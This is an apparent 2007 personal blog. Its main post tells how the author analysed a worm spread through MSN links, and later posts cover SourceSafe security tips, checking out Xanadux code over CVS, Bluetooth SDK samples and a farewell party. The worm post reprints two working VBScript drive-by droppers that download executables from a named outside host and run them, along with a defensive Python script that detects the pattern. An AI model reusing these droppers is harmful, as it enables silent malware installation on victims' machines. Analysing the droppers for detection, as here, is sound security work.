
Sunday, April 29, 2007

Catching a worm

Peace be upon you

It was a tough day for me :D. I was installing Windows and the other things I usually use on my machine. Anyway, the first thing I do after installing Windows is install MSN, and I got a message from someone very important to me; he/she sent me a link:

http://th ecool pics.net/don tclick.jpg

DON'T OPEN THIS LINK, IT HAS THE WORM


I opened the link, and I noticed it caused a long delay on my machine. I said to myself, wait a second and see what is coming; nothing, the page was perfectly normal. After a while I tried to open "Run" and found that it was "Restricted", and the Task Manager too.
I used "Process Explorer" and found some very strange processes. I got MAD: A WORM ON MY MACHINE! Of course I tried all the old tricks, Safe Mode and trying to restore to a working restore point, but NO WAY; the guy who made it is very clever, he expected what I was going to do and he/she deleted my System Restore application :D. For his/her bad luck, I always have a running copy of Windows that I don't touch and use only for emergencies :D. I got a copy of the System Restore application and got back to a clean working point :D, and I decided to find out what the hell was going on :D.
I took the link that I mentioned before, downloaded the image and found that it redirects to some other place, which redirects to a very far place :D. At last I got this code:



Of course, anyone who knows JavaScript will know the escape and unescape functions. I made a very simple page that unescapes this content and puts it in a TextArea, and I found a very nice, simple piece of code for encrypting the content; "dF(s)" was the function name. I made another TextArea to hold the output of the first TextArea, and what I saw shocked me :D. Simply put, I hadn't updated my Internet Explorer for this stupid exploit.

I got the code that copies the worm to my machine,

and here it is





< s_c_r_i_p_t language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/YMworm.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t>

< s_c_r_i_p_t language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/worm2007.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="EXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t >

Now, after I got this simple JavaScript code that copies a stupid executable and runs it on my machine, I downloaded this file and opened it with Notepad :D. Don't laugh, I don't have anything on my HD right now. I found that it is encrypted, so I searched for the file name with the beloved Google and found this link that tells a lot about the virus:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOHANAD.AL&VSect=T
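A small static triage script for the pattern the post dissects (undo JavaScript escape(), reassemble the "&"-concatenated ProgID, and flag the RDS.DataSpace CLSID together with the download, save-to-disk and execute calls). This is an added example written for this page, not code from the post; the sample it scans is constructed, and the indicator list and the %uXXXX handling are my own assumptions.

```python
import re

# CLSID of the MDAC RDS.DataSpace control the post's VBScript instantiates,
# plus the ProgIDs and methods that make up its fetch / save / execute chain.
RDS_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
INDICATORS = ("microsoft.xmlhttp", "adodb.stream", "shell.application", "savetofile", "shellexecute")
_ESCAPED = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")   # what JS escape() emits
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)         # VBScript: name = expr
_LITERAL = re.compile(r'"([^"]*)"')

def js_unescape(text):
    """Undo JavaScript escape(): %XX bytes and %uXXXX code units."""
    return _ESCAPED.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)

def resolve_strings(script):
    """Evaluate assignments built only from quoted literals and known variables joined with '&'."""
    env = {}
    for name, rhs in _ASSIGN.findall(script):
        parts = []
        for tok in re.split(r"\s*&\s*", rhs):
            lit = _LITERAL.fullmatch(tok)
            if lit:
                parts.append(lit.group(1))
            elif tok in env:
                parts.append(env[tok])
            else:
                break            # not a pure string expression; skip this assignment
        else:
            env[name] = "".join(parts)     # e.g. str1=a1&a2&a3&a4 -> "Adodb.Stream"
    return env

def triage(html):
    """Sorted indicators present after decoding and string resolution."""
    text = js_unescape(html)
    haystack = (text + " " + " ".join(resolve_strings(text).values())).lower()
    found = {ind for ind in INDICATORS if ind in haystack}
    if RDS_CLSID in haystack:
        found.add("clsid:rds.dataspace")
    return sorted(found)

# Constructed sample modelled on the post's script: classid line escape()-encoded, ProgID split in four.
SAMPLE = """df.setAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556-65A3-11D0-983A-00C04FC29E36%22
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
S.savetofile fname1,2
Q.ShellExecute fname1,"","","open",0
"""
```

A page that shows the CLSID together with adodb.stream, savetofile and shellexecute is the dropper pattern the post describes; a hit on the CLSID alone is worth a look but is not proof by itself.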

I hope this topic is useful to you, and I want to say one last thing: "DON'T TRUST SOMETHING YOU DON'T SEE; remember, there are optical illusions :D, so don't trust anything :D"

Thursday, April 26, 2007

Messing up with Xanadux code

Peace be upon you

First of all, what is Xanadux? Xanadux is a Linux port for Pocket PC; you can find its project at SourceForge. I will tell you exactly what I faced until I got a copy of the code. First of all, I tried to check out the code in the web viewer; it was nice but not enough. After a while I read that I could download the code if I was using some source control application, a "CVS client". I have known CVS for a long time, but I never thought it might be useful for Windows users. Anyway, I downloaded something called "TortoiseCVS". This application is amazing; it integrates with Windows Explorer. After that I created a new folder, then right-clicked on the new folder and chose "CVS Checkout". After that I entered the path of the CVS in the CVSRoot field, then clicked on "Fetch list", then picked the module that I wanted. Xanadux was about 13 modules; I downloaded them in about 6 hours. I had a quick look over the code, and I can say it is awesome; there are tons of documents. I also tried the "cyace-arm" on EVC4 and it was amazing, "it compiles" with 0 errors and 0 warnings. I didn't try any other module. ALLAH willing, I will continue after I get some free time, and for sure I will write up all I got. Please give me some feedback.

P.S.: Link to Xanadux on SourceForge
http://sourceforge.net/projects/xanadux
P.S.: CVS Root for Xanadux
:pserver:anonymous@xanadux.cvs.sourceforge.net:/cvsroot/xanadux

Saturday, April 21, 2007

Hacking source-safe

Peace be upon you

Hi people, this topic will be very short; it is just a little note for Source-Safe administrators:
your safe can be cracked, which means that the source code is not secure anymore. Simply, it can be hacked because of some human faults; people always do some brute force attacks. All I can say to you is that password hashing in Source-Safe isn't good, but you have to make some policies for protecting your code. This is done by making a good user hierarchy: don't give Administration permission to anyone who deals with code, use misleading names for administration permission, DO NOT EVER USE THE ACCOUNT ADMIN. There are tools that crack Source-Safe passwords; I think you have to make a lot of fake users, and try to find any plug-in for Source-Safe that tracks all the events happening on the code. That's all I can say for now. I will try to get some cases that are more helpful; right now I can't talk a lot about it, because if I said more it would be like "how to hack Source-Safe". For now it's OK; I will try to provide some live samples. Thanks for your time.

Bluetooth development with Desktop

Peace be upon you

How are you guys? I miss you so much; it has been a long time since my last post. Now let's begin.
I will talk today about Bluetooth (the beloved cheap communication method). This thing is brilliant; we haven't utilized it as it should be. Anyway, I will start where my friend Mohamed Allam stopped; he wrote an amazing introduction about Bluetooth, and I will post this document after taking his permission. Anyway, let's talk about how to start developing software for Bluetooth under Windows. When I started this thing I was a little lost, but I found that the AMAZING Microsoft is always ready for any question; they did amazing work in the Windows Platform SDK. I found that there is a sample for Bluetooth and it is so easy to get to what they have done for us. After installing the Microsoft Windows Platform SDK, you will find the sample at this path:

%Program Files Folder%\Microsoft Platform SDK\Samples\NetDS\Bluetooth

Now I think you should read this sample and run it, then continue with this topic :D. I will continue if there is someone interested in this issue; I am waiting for your feedback ;)

bye

The best farewell that ever happened in history was mine

Peace be upon you

I have just left Imaginet. I will say it truly: Imaginet is part of my heart. I don't know why I like this place, but it seems that I like places that make technology. It was so hard to leave there, but it is OK. The best part of it was my farewell party; it was amazing, no, it was more than amazing. All the people were there for me, some people who don't join such parties were there, even the business team was there. I was so happy; every one of them asked me a question, and I was so happy that I was answering without any problem. I like these people so much; I have history with them. I wanted to cry but I felt it was not suitable. People were so nice to me there:

KOKO,S7syko , Maha, Zizo, Malek, Kandel, Hamed, MOHSEEEEEEEEEN :D,Ihab, Rofa, Mr.Bahaa ( The Magician ), Mostafa (IceManZ), Rasha , Hagar

These guys are amazing, I can't forget them; they threw a very amazing party for me.

I LOVE YOU ALL SO MUCH, I WILL MISS YOU SO MUCH

I wish you always remember me well :) and forget about my heavy killing jokes :D; I promise that I will stop them :D

Please always remember me, and I promise that I will never forget any of you.